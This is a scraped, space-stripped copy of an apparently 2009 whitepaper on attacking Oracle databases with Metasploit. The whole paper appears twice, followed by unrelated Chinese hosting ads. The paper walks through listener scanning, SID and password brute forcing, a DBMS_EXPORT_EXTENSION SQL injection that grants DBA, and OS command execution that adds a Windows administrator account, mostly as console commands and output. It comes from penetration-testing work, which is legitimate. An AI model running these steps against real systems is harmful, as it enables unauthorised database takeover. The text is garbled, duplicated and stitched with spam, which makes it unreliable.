commandsnetuser
netuser 时间:2021-04-18 阅读:()
OraclePenetrationTestingUsingtheMetasploitFrameworkChrisGates&MarioCeballosMetasploitProjectAbstractOvertheyearstherehavebeentonsofOracleexploits,SQLInjectionvulnerabilities,andpostexploitationtricksandtoolsthathadnoorder,methodology,orstandardization,mainlyjustrandom.
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
sqlfiles.
Additionally,noneofthepubliclyavailablePentestFrameworkshavetheabilitytoleveragebuilt-inpackageSQLInjectionvulnerabilitiesforprivilegeescalation,dataextraction,orgettingoperatingsystemaccess.
InthiswhitepaperwewillpresentanOraclePentestingMethodologyandgiveyouallthetoolstobreakthe"unbreakable"OracleasMetasploitauxiliarymodules.
We'vecreatedyourversionandSIDenumerationmodules,accountbruteforcingmodules,portedallthepublic(andnotsopublic)OracleSQLInjectionvulnerabilitiesintoSQLImodules(withIDSevasionexamplesfor10g/11g),modulesforOSinteraction,andmodulesforautomatingsomeofourpostexploitationtasks.
ThemodulesarecurrentlyonlysupportedunderLinuxandOSX.
OraclePenetrationTestingMethodologyLocateasystemrunningOracle.
DetermineOracleVersion.
DetermineOracleSID.
Guess/BruteforceUSERNAME/PASS.
PrivilegeEscalationviaSQLInjection.
ManipulateData/PostExploitation.
CoverTracks.
LocatinganOracleSystemYouwilltypicallyfindmostOracleinstallationsbyperformingportscanninginthetargetnetblock.
TheOraclelistenerdefaultportis1521butcanlistenonanportgenerallyinthe1521-1540range.
YoucanalsodiscoveroracleinstancesbyscanningothercommonOracleports.
Reviewhttp://www.
red-database-security.
com/whitepaper/oracle_default_ports.
htmlforcommonOracleports.
GenerallyrunningaservicescanwillNOTgiveyoutheOracleTNSListenerversionbutupdatedfingerprintsfornewversionsofNmapmayyieldversionsinsomesituations.
cg@attack:~$nmap-sV192.
168.
0.
100-105-p1521StartingNmap4.
85BETA8(http://nmap.
org)at2009-06-1815:25EDTInterestingportson192.
168.
0.
100:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListenerInterestingportson192.
168.
0.
101:PORTSTATESERVICEVERSION1521/tcpopenoracle-tnsOracleTNSListener9.
2.
0.
1.
0(for32-bitWindows)YoucanalsodiscoverOracleinstancesusingsearchengines.
AlexKornbrustofRed-Database-Securityhaswrittentwoexcellentwhitepapersdiscussingthissubject.
1,2TNSandOracleMixinsforMetasploit.
TwonewmixinshavebeenaddedtotheMetasploitTrunk.
ThefirstmixinisaTNSmixinthatallowsMetasploittocraftTNSpackets.
ThesecondmixinisanOraclemixinthatallowsustousesomeadditionallibariestowrapOraclecommands.
TheTNSmixinishandybecauseitessentiallyreplacestnscmd.
plyoucanpassanydatayouwantinsidetheTNSpacket.
Connectconnect_data="(CONNECT_DATA=(COMMAND=VERSION))"pkt=tns_packet(connect_data)sock.
put(pkt)sock.
get_onceres=sock.
get_once(-1,2)putsresdisconnectTheOraclemixinservesasthewrappercodeforruby-dbi,ruby-oci8,andtheoraclesqlplusclient.
Ithandlesconnectingtotheremotedatabase,sendingSQLqueriesanddisconnecting.
Thecoreofthisfunctionalityisfoundintheprepare_exec()method.
ThismethodconnectstothedatabaseusingDBIDBI.
connect("DBI:OCI8://#{datastore['RHOST']}:#{datastore['RPORT']}/#{datastore['SID']}","#{datastore['DBUSER']}","#{datastore['DBPASS']}")andthenpasseswhateverdata(SQL)youspecify.
function="CREATEORREPLACEFUNCTION#{p}RETURNNUMBERAUTHIDCURRENT_USERASPRAGMAAUTONOMOUS_TRANSACTION;BEGINEXECUTEIMMEDIATE'#{datastore['SQL']}';COMMIT;RETURN(0);1http://www.
red-database-security.
com/wp/google_oracle_hacking_us.
pdf2http://www.
red-database-security.
com/wp/yahoo_oracle_hacking_us.
pdfEND;"beginprint_status("Sendingfunction.
.
.
")prepare_exec(function)endDetermineOracleVersionusingMetasploitModules.
AOracleversionscannerusingtheTNSmixinhasbeenaddedtotheMetasploittrunk.
msfauxiliary(tnslsnr_version)>infoName:OracletnslsnrServiceVersionQuery.
Version:6479License:MetasploitFrameworkLicense(BSD)Providedby:CGBasicoptions:NameCurrentSettingRequiredDescriptionRHOSTSyesThetargetaddressrangeorCIDRidentifierRPORT1521yesThetargetportTHREADS1yesThenumberofconcurrentthreadsDescription:ThismodulesimplyqueriesthetnslsnrservicefortheOraclebuild.
msfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
100RHOSTS=>192.
168.
0.
100msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
100isrunning:32-bitWindows:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
101RHOSTS=>192.
168.
0.
101msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
101isrunning:32-bitWindows:Version9.
2.
0.
7.
0–Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
102RHOSTS=>192.
168.
0.
102msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
102isrunning:Solaris:Version10.
2.
0.
1.
0-Productionmsfauxiliary(tnslsnr_version)>setRHOSTS192.
168.
0.
103RHOSTS=>192.
168.
0.
103msfauxiliary(tnslsnr_version)>run[*]Host192.
168.
0.
103isrunning:Linux:Version11.
1.
0.
6.
0-Production[*]AuxiliarymoduleexecutioncompletedDetermineOracleSIDusingMetasploitModulesOraclepriorto9.
2.
0.
8willjustreturntheSIDifrequested.
After9.
2.
0.
8andforallnewversionsofOracleyouhavetoguess,bruteforce,orotherwisedeterminetheSID.
[*]Host192.
168.
0.
105isrunning:32-bitWindows:Version9.
2.
0.
1.
0–Productionmsf>useauxiliary/scanner/oracle/sid_enummsfauxiliary(sid_enum)setRHOSTS192.
168.
0.
105RHOSTS=>192.
168.
0.
105msfauxiliary(sid_enum)>run[*]IdentifiedSIDfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSIDfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:PLSExtProc[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxt[*]IdentifiedSERVICE_NAMEfor192.
168.
0.
105:cyxtXDB[*]AuxiliarymoduleexecutioncompletedBruteforcingtheSIDWeusetheServiceID(SID)listfromRed-Database-Security3andperformadictionaryattack.
msfauxiliary(sid_brute)>run[*]Startingbruteforceon192.
168.
0.
103,usingsidsfrom/home/cg/evil/msf3/dev/data/exploits/sid.
txt.
.
.
[*]FoundSID'ORCL'forhost192.
168.
0.
103[*]AuxiliarymoduleexecutioncompletedUsingotherOraclecomponentstodeterminetheSIDWecanuseotherOracleservletsandapplicationstolearntheSIDiftheyareavailable.
EnterpriseMangerConsoleexample:3http://www.
red-database-security.
com/scripts/sid.
txtmsfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/oas_sidmsfauxiliary(oas_sid)>run[*]DiscoveredSID:'orc10'forhost172.
10.
1.
109[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(oas_sid)>Servelet/spyexample:msfauxiliary(sid_enum)>run[-]TNSlistenerprotectedfor172.
10.
1.
108.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sid_enum)>useauxiliary/scanner/oracle/spy_sidmsfauxiliary(spy_sid)>run[*]DiscoveredSID:'orcl'forhost192.
168.
0.
103[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(spy_sid)>Guess/BruteforceUSER/PASSWeusePeteFinnigan'sdefaultpasswordlist4msfauxiliary(brute_login)>run.
[-]ORA-01017:invalidusername/password;logondenied[-]ORA-01017:invalidusername/password;logondenied[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(brute_login)>db_notes[*]Time:SatMay3008:44:09-05002009Note:host=172.
10.
1.
109type=BRUTEFORCED_ACCOUNTdata=SCOTT/TIGERSQLInjectionforPrivilegeEscalationmsf>useauxiliary/sqli/oracle/dbms_export_extensionmsfauxiliary(dbms_export_extension)>infoName:SQLInjectionviaDBMS_EXPORT_EXTENSION.
Version:$Revision:$Providedby:MCBasicoptions:NameCurrentSettingRequiredDescription4http://www.
petefinnigan.
com/default/default_password_list.
htmSQLGRANTDBATOSCOTTyesnoSQLtorun.
DBPASSTIGERyesThepasswordtoauthenticateas.
DBUSERSCOTTyesTheusernametoauthenticateas.
RHOST127.
0.
0.
1yesTheOraclehost.
RPORT1521yesTheTNSport.
SIDDEMOyesThesidtoauthenticatewith.
Description:ThismodulewillescalateaOracleDBusertoDBAbyexploitingansqlinjectionbugintheDBMS_EXPORT_EXTENSIONpackage.
msfauxiliary(dbms_export_extension)>setRHOST192.
168.
100.
25RHOST=>192.
168.
100.
25msfauxiliary(dbms_export_extension)>setSIDUNLUCKYSID=>UNLUCKYmsfauxiliary(dbms_export_extension)>run[*]Sendingpackage.
.
.
[*]Done.
.
.
[*]Sendingbody.
.
.
[*]Done.
.
.
[*]Sendingdeclare.
.
.
[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(dbms_export_extension)>Verifyitworkedmsfauxiliary(oracle_sql)>setSQLselect*fromuser_role_privsSQL=>select*fromuser_role_privsmsfauxiliary(oracle_sql)>run[*]SendingSQL.
.
.
[*]SCOTT,CONNECT,NO,YES,NO[*]SCOTT,DBA,NO,YES,NOPostExploitationTheprimarymoduleforpostexploitationthatwillbereleasedisthewin32_execmodule.
Thismodulecreatesajavaclasstoexecutesystemcommands,executesthosecommands,thendeletestheclass.
Similartothis:http://www.
0xdeadbeef.
info/exploits/raptor_oraexec.
sql.
ThistechniqueisalsodiscussedintheOracleHacker'sHandbookbyDavidLitchfield.
msfauxiliary(win32exec)>setCMD"netuserdbaP@ssW0rd1234/add"CMD=>netuserdbaP@ssW0rd1234/addmsfauxiliary(win32exec)>run[*]CreatingMSFJAVAclass.
.
.
[*]Done.
.
.
[*]CreatingMSFprocedure.
.
.
[*]Done.
.
.
[*]Sendingcommand:'netuserdbaP@ssW0rd1234/add'[*]Done.
.
.
[*]AuxiliarymoduleexecutioncompletedUsefulSiteforOracleHackinghttp://www.
red-database-security.
com/http://www.
petefinnigan.
com/http://rawlab.
mindcreations.
com/http://www.
0xdeadbeef.
info/http://dsecrg.
com/http://www.
databasesecurity.
com/http://www.
davidlitchfield.
com/security.
htmhttp://www.
ngssoftware.
com/research/http://sourceforge.
net/projects/ingumahttp://www.
oracleforensics.
com/wordpress/DependencyInstallationInstructionsOracleMixinInstallNotesforLinux-testedonUbuntu8.
10&9.
04-startwithaworkingversionofmetasploittrunk#installoracleinstantclient#http://www.
oracle.
com/technology/software/tech/oci/instantclient/index.
html#recommendinstantclient10,thisshouldallowyoutotalkwith8,9,10,&11versions.
Grab*InstantClientPackage-Basic*InstantClientPackage-SDK*InstantClientPackage-SQL*Plus**notneededformetasploitbutusefultohave--unzipinto/opt/oraclecg@segfault:~/$cd/opt/oraclecg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-basic-10.
2.
0.
4-1.
i386.
zipcg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-sqlplus-10.
2.
0.
4-1.
i386.
zicg@segfault:/opt/oracle$unzip/opt/oracle/oracle-instantclient-devel-10.
2.
0.
4-1.
i386.
zipitwillunzipeverythinginto/opt/oracle/instantclient_10_2/createyoursymlinkcg@segfault:/opt/oracle/instantclient_10_2$ln-slibclntsh.
so.
10.
1libclntsh.
so#Setupyourenviroment.
bashrcexportPATH=$PATH:/opt/oracle/instantclient_10_2exportSQLPATH=/opt/oracle/instantclient_10_2exportTNS_ADMIN=/opt/oracle/instantclient_10_2exportLD_LIBRARY_PATH=/opt/oracle/instantclient_10_2exportORACLE_HOME=/opt/oracle/instantclient_10_2#Installruby-dbi-0.
1.
1#http://rubyforge.
org/projects/ruby-dbi/#http://rubyforge.
org/frs/download.
php/12368/dbi-0.
1.
1.
tar.
gzcg@segfault:~$tarxvzfdbi-0.
1.
1.
tar.
gzcg@segfault:~$cdruby-dbi/(Hint:Catthe.
.
/ruby-dbi/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-dbi$rubysetup.
rbconfig--with=dbi,dbd_pgcg@segfault:~/ruby-dbi$rubysetup.
rbsetupcg@segfault:~/ruby-dbi$sudorubysetup.
rbinstall#Installruby-oci8-1.
0.
0#http://rubyforge.
org/projects/ruby-oci8/#http://rubyforge.
org/frs/download.
php/28396/ruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$tarxvzfruby-oci8-1.
0.
0.
tar.
gzcg@segfault:~$cdruby-oci8-1.
0.
0/(Hint:Catthe.
.
ruby-oci8-1.
0.
0/READMEfileinanotherterminalforreference)cg@segfault:~/ruby-oci8-1.
0.
0$envcg@segfault:~/ruby-oci8-1.
0.
0$LD_LIBRARY_PATH=/opt/oracle/instantclient_10_2/cg@segfault:~/ruby-oci8-1.
0.
0$exportLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$env|grepLD_LIBRARY_PATHcg@segfault:~/ruby-oci8-1.
0.
0$makecg@segfault:~/ruby-oci8-1.
0.
0$sudomakeinstall#verifysqlplusworkscg@segfault:~$sqlplusSQL*Plus:Release10.
2.
0.
4.
0-ProductiononSunMay312:24:512009Copyright(c)1982,2007,Oracle.
AllRightsReserved.
Enteruser-name:#testtheOraclemodulesmsfauxiliary(sql)>run[*]SendingSQL.
.
.
[*]Oracle8iEnterpriseEditionRelease8.
1.
7.
0.
0-Production[*]PL/SQLRelease8.
1.
7.
0.
0-Production[*]CORE8.
1.
7.
0.
0Production[*]TNSforSolaris:Version8.
1.
7.
0.
0-Production[*]NLSRTLVersion3.
4.
1.
0.
0-Production[*]Done.
.
.
[*]Auxiliarymoduleexecutioncompletedmsfauxiliary(sql)>
- commandsnetuser相关文档
- daynetuser
- canetuser
- 2015年本科生毕业论文检测系统启用说明
- Audionetuser
- correctednetuser
- Periodicallynetuser
杭州王小玉网-美国CERA 2核8G内存19.9元/月,香港,日本E3/16G/20M CN2带宽150元/月,美国宿主机1500元,国内宿主机1200元
官方网站:点击访问王小玉网络官网活动方案:买美国云服务器就选MF.0220.CN 实力 强 强 强!!!杭州王小玉网络 旗下 魔方资源池 “我亏本你引流活动 ” mf.0220.CNCPU型号内存硬盘美国CERA机房 E5 2696v2 2核心8G30G总硬盘1个独立IP19.9元/月 续费同价mf.0220.CN 购买湖北100G防御 E5 2690v2 4核心4G...
10gbiz:香港/洛杉矶CN2直连线路VPS四折优惠,直连香港/香港/洛杉矶CN2四折
10gbiz怎么样?10gbiz在本站也多次分享过,是一家成立于2020的国人主机商家,主要销售VPS和独立服务器,机房目前有中国香港和美国洛杉矶、硅谷等地,线路都非常不错,香港为三网直连,电信走CN2,洛杉矶线路为三网回程CN2 GIA,10gbiz商家七月连续推出各种优惠活动,除了延续之前的VPS产品4折优惠,目前增加了美国硅谷独立服务器首月半价的活动,有需要的朋友可以看看。10gbiz优惠码...
快云科技,美国VPS 2H5G独享20M 仅售19.8/月 年付仅需148
快云科技已稳步运行进两年了 期间没出现过线路不稳 客户不满意等一系列问题 本司资质齐全 持有IDC ICP ISP等正规手续 有独特的网站设计理念 在前几天刚是参加过魔方系统举行的设计大赛拿获最佳设计奖第一名 本公司主营产品 香港弹性云服务器,美国vps和日本vps,香港物理机,国内高防物理机以及美国日本高防物理机 2020年的国庆推出过一款香港的回馈用户特惠机 已作为传家宝 稳定运行 马上又到了...
netuser为你推荐
-
建企业网站建立一个企业网站要多少钱360防火墙在哪里设置360安全防护中心在哪资费标准联通所有套餐介绍开放平台微信的开放平台是干什么用的抢米网怎么用小米商城可以快速抢到手机!大侠们 帮帮忙!抢米网会知道怎样抢小米的请进来说一下。宜人贷官网宜人贷是不是骗人的12306.com如何登录12306网络u盘网吧网络U盘是怎么弄的工具条手机的工具栏怎么在任务栏里?怎么把工具栏调到手机下面?